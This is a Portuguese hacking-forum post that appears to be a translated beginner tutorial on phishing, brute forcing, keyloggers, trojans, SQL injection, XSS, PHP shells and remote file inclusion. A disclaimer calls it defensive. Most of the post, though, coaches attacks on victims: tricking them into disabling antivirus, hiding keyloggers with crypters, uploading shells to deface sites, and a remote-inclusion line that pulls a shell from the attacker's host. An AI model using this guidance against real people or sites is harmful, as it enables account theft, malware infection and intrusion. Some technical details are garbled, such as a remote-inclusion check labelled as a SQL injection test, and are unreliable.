COVIL HACKER

, ! .


» COVIL HACKER » Hacking & Phreaking » Informações completas de HACKING


Informações completas de HACKING

1 2 2

1

Vemos milhões de pessoas acessando diferentes fóruns e sites e perguntando "como faço para hackear um e-mail?", "Você pode hackear blá para mim?". Então pensei em criar um tutorial que vai te dar a ideia básica sobre o que diabos é um "HACK", e como SE DEFENDER CONTRA HACKERS.

Isenção de responsabilidade:

como já vi controvérsias no passado, aqui está o aviso.

Eu ou a equipe do Go4expert.com não assumimos qualquer responsabilidade se você usar este tutorial de maneira antiética. Isso foi escrito para ajudá-lo a tomar cuidado com o que está acontecendo e se salvar não sendo hackeado!

Fundo:

O hacking começou muito longe quando o windowsd 98 foi projetado. Hackear é basicamente descobrir as brechas e tentar vazar algumas informações, o que pode levar você a obter algumas informações críticas, como senhas, detalhes do cartão de crédito. Às vezes, o hacking é feito apenas por causa de ofensas pessoais.

Coisas para lembrar

Vou sugerir a você, CONTINUE LENDO ARTIGOS E TUTORIAIS DE BONS SITES. ESSA É A ÚNICA MANEIRA DE APRENDER.

Inicialização:

Voltando ao ponto principal, vou discutir brevemente algumas das formas de hackear. Hacking é basicamente bifurcado em 2 partes principais.

1. E-mail ou informações do usuário
2. Hacking baseado na Web.

E-mail ou informações do usuário:

Atualmente, a maneira mais comum e famosa de hackear informações do usuário, como e-mails, senhas e detalhes do cartão de crédito, é a seguinte:

a. Phishing
b. Força Bruta
c. Registro de teclas
d. Troianos

A. Phishing:
Phishing é basicamente um ataque massivo. O que um hacker faz é criar uma página absolutamente parecida com algum site como yahoo ou gmail. Eles o carregam em seu próprio servidor. E dê o link para qualquer usuário do n00b. Ao abri-lo, eles pensam que estão na página do yahoo ou gmail, colocam seu nome de usuário e senha, clicam em enviar e UAU! Sua informação foi enviada. Isso é amplamente usado por novas pessoas que tentam entrar no mundo do hacking.
O exemplo mais recente na Índia foi algum golpe com o banco ICICI, muitas informações do usuário foram roubadas, pelo que me lembro. Eu li em algum lugar no jornal e estava pensando que diabos! ?

Desvantagens: Ainda assim, muitas pessoas tentam antes de tentar o phishing, porque o único problema do phishing é que, mesmo que a vítima conheça um pouco sobre a Internet, ela lerá a URL e entenderá que não é um site genuíno.
b. Força Bruta
Brute forcer é basicamente um programa que pode ser chamado de "cracker". No brute forcer, você coloca o nome de usuário que deseja hackear e, como senha, coloca um arquivo de bloco de notas que contém quase todas as palavras em inglês existentes. Então, o que ele faz é tentar cada palavra desse arquivo e ver se alguma corresponde. Você deve ter notado alguns tópicos como "enorme lista de senhas" em diferentes fóruns, eles nada mais são do que a lista de senhas para colocar em seu bruteforcer.!

Desvantagens:
1. Às vezes, a força bruta pode durar séculos!
2. Não é garantido
3. Hoje em dia, muitas pessoas têm senhas com símbolos alfanuméricos, o que é muito difícil para o bruteforcer detectar
4. A maioria dos sites famosos como yahoo, gmail são projetados de forma a colocar o "captcha de imagem" após 3 tentativas incorretas de login, o que interrompe o bruteforcer.

PS:- Fiz alguns bruteforcers focados em FTP, Gmail e Yahoo que estão disponíveis em meu site.
c. Keylogging
O Keylogger ajuda você a criar um pequeno arquivo conhecido como "servidor". Você tem que enviar seu servidor para a vítima. ele tem que clicar nele e então SEU FEITO! Isto é o que acontece.
Melhor maneira possível de hackear alguém. Os keyloggers são basicamente um programa que se instala no computador da vítima e continua gravando cada tecla pressionada pela vítima em seu teclado e o envia ao hacker. Existem muitas maneiras de receber o pressionamento de tecla, ou seja, FTP, e-mail, mensageiros. Na minha opinião, esta é a melhor maneira de enganar sua vítima e obter suas informações.

Desvantagens:
1. Quando a vítima recebe o keylogger, na maioria dos casos, seu antivírus os exclui automaticamente. Então você tem que convencê-los a desativar o antivírus blefando alguma coisa.
2. Às vezes, o firewall bloqueia o envio dos keylogs.

Pontas :
1. Existem alguns programas conhecidos como "crypters" que o ajudarão a tornar o servidor indetectável. Portanto, o antivírus da sua vítima não seria capaz de detectá-los.
d. Cavalos de Troia:
os cavalos de Troia são como o pai dos keyloggers. O Trojan envia os keylogs como keyloggers e, além disso, permite que você assuma o controle do computador da vítima. Edite / exclua / carregue / baixe arquivos de ou para o computador. Alguns recursos mais engraçados, como isso, farão o teclado enlouquecer, pode continuar ejetando e reinserindo o cd ROM. Muito mais...

Desvantagens:
Igual aos keyloggers.

Dicas:
Igual ao keylogger.
Hacking na Web:

Discutirei algumas técnicas de hacking da Web mais comumente usadas, que ajudam os hackers a invadir qualquer site. Isso ajudará você a SALVAR SEU SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. Existem mais alguns, mas são MUITO grandes para serem discutidos aqui.

1. SQL Injection:
A maioria dos sites atualmente está conectada a um banco de dados SQL. O que os ajuda a armazenar nomes de usuário e senhas [criptografados] quando um visitante se registra em seu site. O banco de dados SQL processa uma consulta toda vez que o usuário loga. Ele vai no banco de dados, valida a senha, se estiver correto loga o usuário e se não estiver dá erro.
Então o funda básico está executando um comando para parase uma consulta no banco de dados para tentar explorar as informações de internet do banco de dados. Eu realmente não posso colocar todo o tutorial porque esta é a maneira mais complicada de hackear o site!

PS:- Se você quiser verificar se o SEU site é vulnerável a anexar RFI ou não, faça o seguinte.

Se a URL do seu site for:
Código:
yoursite.com/index.php?id=545
basta adicionar um ' assim no final
Code:
yoursite.com/index.php?id=545'
2. XSS:
XSS é outra boa maneira de acessar algum site. Suponha que algum site/fórum esteja permitindo HTML no psot ou artigos, então um hacker pode postar um script malicioso no conteúdo. Portanto, sempre que um usuário abrir a página, os cookies serão enviados ao hacker. Então ele pode fazer o login como aquele usuário e foder o site.
3. Shells:
Shell é um script .php malicioso. O que você precisa fazer é encontrar um lugar em qualquer site onde possa fazer upload de qualquer arquivo, como avatares, receitas, seus truques, seus feedbacks. E você tenta fazer upload de seus arquivos shell de lá. E se for carregado, WHOA! você o abre na barra de URL e pode ver toda a conta "FTP" dessa hospedagem na web. Você pode renomear/editar/carregar/baixar o que quiser, incluindo a página de índice.
Isso também é conhecido como desfigurar.
4. RFI:
RFI é uma boa maneira de desfigurar um site. É usado com casca. Suponha que você tenha carregado seu shell em:
Code:
yoursite.com/shell.txt
e encontrou um site vulnerável ao RFI... então você pode fazer o seguinte:
Code:
vítimassite.com
/index.php?page=yousite.com/shell.txt Isso novamente lhe dará acesso aos sites FTP de sua vítima, assim como shell para que você possa foder com o que quiser.

PS:- Se você quiser verificar se o SEU site é vulnerável a anexar RFI ou não, faça o seguinte.

Se o URL do seu site for:
Código:
yoursite.com/index.php?id=545
, basta adicionar algo como isto no final
Código:
yoursite.com/index.php?id= http://www.google.com
E se incluir a página do Google em sua página, isso significa que é vulnerável a RFI.
APROVEITAR!..........

0

2


» COVIL HACKER » Hacking & Phreaking » Informações completas de HACKING


|